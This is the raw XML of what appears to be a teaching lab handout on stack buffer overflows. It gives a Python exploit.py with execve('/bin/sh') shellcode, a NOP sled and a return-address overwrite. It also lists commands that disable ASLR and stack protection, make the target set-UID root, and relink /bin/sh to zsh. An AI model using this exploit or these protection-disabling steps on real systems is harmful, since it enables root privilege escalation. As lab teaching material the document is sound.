                          <w:p w14:paraId="277C0CDB" w14:textId="5D05E7A0" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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1E4A36E" w14:textId="77777777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shellcode= (</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B5E99FC" w14:textId="155D917E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"\x31\xc0" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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xorl %eax,%eax</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77464F61" w14:textId="221A0795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"\x50" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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pushl %eax</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5F603FBC" w14:textId="19C0DE0C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"\x68""</w:t>
                            </w:r>
                            <w:r w:rsidRPr="009C1AAB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//sh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# pushl $0x68732f2f</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A7A071C" w14:textId="53CD7DDB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"\x68""/bin" # pushl $0x6e69622f</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="066F81A9" w14:textId="65534CE2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"\x89\xe3" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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movl %esp,%ebx</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7ECDE49E" w14:textId="73C3EEC9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"\x50" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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pushl %eax</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BC87264" w14:textId="06B4198F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"\x53" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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pushl %ebx</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13D93CE0" w14:textId="676E2EF8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"\x89\xe1" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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movl %esp,%ecx</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="100108FD" w14:textId="27519E1E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"\x99" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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cdq</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12C27A73" w14:textId="0244B83F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"\xb0\x0b" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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movb $0x0b,%al</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="49E04B85" w14:textId="07FF70D0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"\xcd\x80" </w:t>
                            </w:r>
                            <w:r w:rsidR="002F24A0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int $0x80</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CBDFA91" w14:textId="6B784F25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"\x00"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4693DC90" w14:textId="6F001778" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A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).encode('latin-1')</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="71914EA0" w14:textId="6E825006" w:rsidR="00C60560" w:rsidRPr="009C1AAB" w:rsidRDefault="00C60560" w:rsidP="00D65B1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4435E43" w14:textId="77777777" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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Fill the content with NOP’s</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1844F8C8" w14:textId="28598EED" w:rsidR="00C60560" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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content = bytearray(0x90 for i in range(300))</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0ECCED92" w14:textId="66C2BADA" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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D02C6B2" w14:textId="77777777" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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Put the shellcode at the end</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E8D613F" w14:textId="09E461A1" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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start = 300 - len(shellcode)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="57871B9B" w14:textId="2C3CED58" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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content[start:] = shellcode</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="386A1BFD" w14:textId="59C09CA3" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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C5845DD" w14:textId="55D9C0CD" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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##############################################################</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FD8D5CD" w14:textId="425DCF3C" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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ret = 0x</w:t>
                            </w:r>
                            <w:r w:rsidRPr="009C1AAB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AAAAAAAA</w:t>
                            </w:r>
                            <w:r w:rsidR="006321D7" w:rsidRPr="009C1AAB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+ 120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# </w:t>
                            </w:r>
                            <w:r w:rsidR="003E5D8C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update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0x</w:t>
                            </w:r>
                            <w:r w:rsidRPr="009C1AAB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AAAAAAAA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with the </w:t>
                            </w:r>
                            <w:r w:rsidR="003E5D8C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ebp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</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C8EF56A" w14:textId="2EDA5CF5" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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content[</w:t>
                            </w:r>
                            <w:r w:rsidR="006321D7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112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</w:t>
                            </w:r>
                            <w:r w:rsidR="006321D7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116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(ret).to_bytes(4,byteorder=</w:t>
                            </w:r>
                            <w:r w:rsidR="006321D7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little</w:t>
                            </w:r>
                            <w:r w:rsidR="006321D7"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</w:t>
                            </w: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D46105A" w14:textId="3AA1E702" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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##############################################################</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="702815C2" w14:textId="3AF4ED9B" w:rsidR="004470AC" w:rsidRPr="009C1AAB" w:rsidRDefault="004470AC" w:rsidP="00B9448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2A9AECC" w14:textId="77777777" w:rsidR="0042624B" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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Write the content to badfile</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="62A382ED" w14:textId="6E5BA255" w:rsidR="0042624B" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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with open('badfile', 'wb') as f:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="614C14F2" w14:textId="0A9123B5" w:rsidR="004470AC" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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C1AA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f.write(content)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CC03" id="Text Box 5" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:34.5pt;width:468pt;height:326.25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" fillcolor="#e7e6e6 [3214]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3072641A" w14:textId="485F0398" w:rsidR="00A76B6F" w:rsidRPr="009C1AAB" w:rsidRDefault="00A76B6F" w:rsidP="000F503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#!/</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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usr/bin/python3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="77F8CBE3" w14:textId="6F9A5103" w:rsidR="000F5031" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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</w:t>
                      </w:r>
                      <w:r w:rsidR="00035832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exploit</w:t>
                      </w:r>
                      <w:r w:rsidR="000F5031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</w:t>
                      </w:r>
                      <w:r w:rsidR="00D65742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py</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="288D9ADF" w14:textId="0E22D5CE" w:rsidR="000F5031" w:rsidRPr="009C1AAB" w:rsidRDefault="000F5031" w:rsidP="000F503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9710119" w14:textId="7D0AEEE7" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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gram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</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="277C0CDB" w14:textId="5D05E7A0" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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1E4A36E" w14:textId="77777777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shellcode= (</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B5E99FC" w14:textId="155D917E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"\x31\xc0" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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xorl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%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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eax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,%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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77464F61" w14:textId="221A0795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"\x50" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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pushl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%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5F603FBC" w14:textId="19C0DE0C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"\x68""</w:t>
                      </w:r>
                      <w:r w:rsidRPr="009C1AAB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//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sh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 # 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pushl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$0x68732f2f</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A7A071C" w14:textId="53CD7DDB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"\x68""/bin" # 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pushl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$0x6e69622f</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="066F81A9" w14:textId="65534CE2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"\x89\xe3" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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esp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,%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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ebx</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="7ECDE49E" w14:textId="73C3EEC9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"\x50" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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pushl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%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eax</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="3BC87264" w14:textId="06B4198F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"\x53" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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pushl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%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ebx</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="13D93CE0" w14:textId="676E2EF8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"\x89\xe1" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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movl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%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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esp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,%</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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ecx</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="100108FD" w14:textId="27519E1E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"\x99" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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cdq</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="12C27A73" w14:textId="0244B83F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"\xb0\x0b" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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movb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$0x0</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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b,%</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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al</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="49E04B85" w14:textId="07FF70D0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"\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xcd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\x80" </w:t>
                      </w:r>
                      <w:r w:rsidR="002F24A0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 int $0x80</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CBDFA91" w14:textId="6B784F25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"\x00"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4693DC90" w14:textId="6F001778" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A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).encode</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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('latin-1')</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="71914EA0" w14:textId="6E825006" w:rsidR="00C60560" w:rsidRPr="009C1AAB" w:rsidRDefault="00C60560" w:rsidP="00D65B1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4435E43" w14:textId="77777777" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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 Fill the content with NOP’s</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1844F8C8" w14:textId="28598EED" w:rsidR="00C60560" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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content = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gram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bytearray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0x90 for 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 range(300))</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0ECCED92" w14:textId="66C2BADA" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00205AF1" w:rsidP="00205AF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D02C6B2" w14:textId="77777777" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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 Put the shellcode at the end</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E8D613F" w14:textId="09E461A1" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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start = 300 - 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(shellcode)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="57871B9B" w14:textId="2C3CED58" w:rsidR="00205AF1" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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content[start:] = shellcode</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="386A1BFD" w14:textId="59C09CA3" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00D0570F" w:rsidP="00D0570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C5845DD" w14:textId="55D9C0CD" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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##############################################################</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FD8D5CD" w14:textId="425DCF3C" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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ret = 0x</w:t>
                      </w:r>
                      <w:r w:rsidRPr="009C1AAB"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AAAAAAAA</w:t>
                      </w:r>
                      <w:r w:rsidR="006321D7" w:rsidRPr="009C1AAB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+ 120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# </w:t>
                      </w:r>
                      <w:r w:rsidR="003E5D8C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update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0x</w:t>
                      </w:r>
                      <w:r w:rsidRPr="009C1AAB"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AAAAAAAA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with the </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="003E5D8C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ebp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</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C8EF56A" w14:textId="2EDA5CF5" w:rsidR="00B9448B" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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content[</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="006321D7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112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</w:t>
                      </w:r>
                      <w:r w:rsidR="006321D7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116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(ret).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to_bytes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(4,byteorder=</w:t>
                      </w:r>
                      <w:r w:rsidR="006321D7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little</w:t>
                      </w:r>
                      <w:r w:rsidR="006321D7"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</w:t>
                      </w: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4D46105A" w14:textId="3AA1E702" w:rsidR="00D0570F" w:rsidRPr="009C1AAB" w:rsidRDefault="00B9448B" w:rsidP="00B9448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##############################################################</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="702815C2" w14:textId="3AF4ED9B" w:rsidR="004470AC" w:rsidRPr="009C1AAB" w:rsidRDefault="004470AC" w:rsidP="00B9448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2A9AECC" w14:textId="77777777" w:rsidR="0042624B" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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# Write the content to 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badfile</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="62A382ED" w14:textId="6E5BA255" w:rsidR="0042624B" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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with </w:t>
                      </w:r>
                      <w:proofErr w:type="gram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open(</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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badfile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', '</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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wb</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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') as f:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="614C14F2" w14:textId="0A9123B5" w:rsidR="004470AC" w:rsidRPr="009C1AAB" w:rsidRDefault="0042624B" w:rsidP="0042624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f.write</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="009C1AA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(content)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47666">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:r w:rsidR="000017F3">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="006A5E58">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidR="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="000017F3">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000017F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidR="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is used to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="000017F3">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="00FD1601">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> replac</w:t>
      </w:r>
      <w:r w:rsidR="000017F3">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00FD1601">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1601" w:rsidRPr="00B9448B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00FD1601" w:rsidRPr="00B9448B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>AAAAAAAA</w:t>
      </w:r>
      <w:r w:rsidR="00FD1601">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the code with the value of frame pointer </w:t>
      </w:r>
      <w:r w:rsidR="00FD1601" w:rsidRPr="00FD1601">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidR="00FD1601">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> you find in Task 3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D514A7B" w14:textId="0FB73B2D" w:rsidR="004A46FC" w:rsidRDefault="004A46FC" w:rsidP="004A46FC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After updat</w:t>
      </w:r>
      <w:r w:rsidR="00696A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="0078289D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">, run the python program </w:t>
      </w:r>
      <w:r w:rsidRPr="004A46FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:r w:rsidRPr="004A46FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324BF4D" w14:textId="49988802" w:rsidR="00501F66" w:rsidRPr="00501F66" w:rsidRDefault="0094636A" w:rsidP="0094636A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6F343" w14:textId="0C7EFFAA" w:rsidR="00791993" w:rsidRDefault="004B17CD" w:rsidP="000F5031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Compile the vulnerable program </w:t>
      </w:r>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003870DE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> countermeasures turned off</w:t>
      </w:r>
      <w:r w:rsidR="00791993">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CA4238" w14:textId="77777777" w:rsidR="00E63FF9" w:rsidRPr="002941FD" w:rsidRDefault="00E63FF9" w:rsidP="006630C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002941FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521C836" w14:textId="0CC958CD" w:rsidR="00791993" w:rsidRPr="00CB0AC4" w:rsidRDefault="00E63FF9" w:rsidP="006630C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0AC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc stack.c -z execstack -fno-stack-protector -o stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0FB64" w14:textId="7F22C810" w:rsidR="004C24AC" w:rsidRDefault="00F93235" w:rsidP="006203B4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Change the owner of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F93235">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to root, and turn on its set-UID bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903091D" w14:textId="401034DF" w:rsidR="004C24AC" w:rsidRDefault="004C24AC" w:rsidP="006203B4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>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>The shellcode invoke</w:t>
      </w:r>
      <w:r w:rsidR="00DE3003">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> a shell program</w:t>
      </w:r>
      <w:r w:rsidR="00DE3003">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE3003" w:rsidRPr="004C24AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. By default, </w:t>
      </w:r>
      <w:r w:rsidRPr="0059384C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a symbolic link pointing to </w:t>
      </w:r>
      <w:r w:rsidRPr="0059384C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>dash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will automatically drop root privilege in a Set-UID process. To demonstrate the attack, please run</w:t>
      </w:r>
      <w:r w:rsidR="000A7E72">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to link </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/zsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D57CD" w14:textId="4BBF606B" w:rsidR="008F7892" w:rsidRDefault="008F7892" w:rsidP="008F7892">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo ln -sf /bin/zsh /bin/sh</w:t>
      </w:r>
    </w:p>
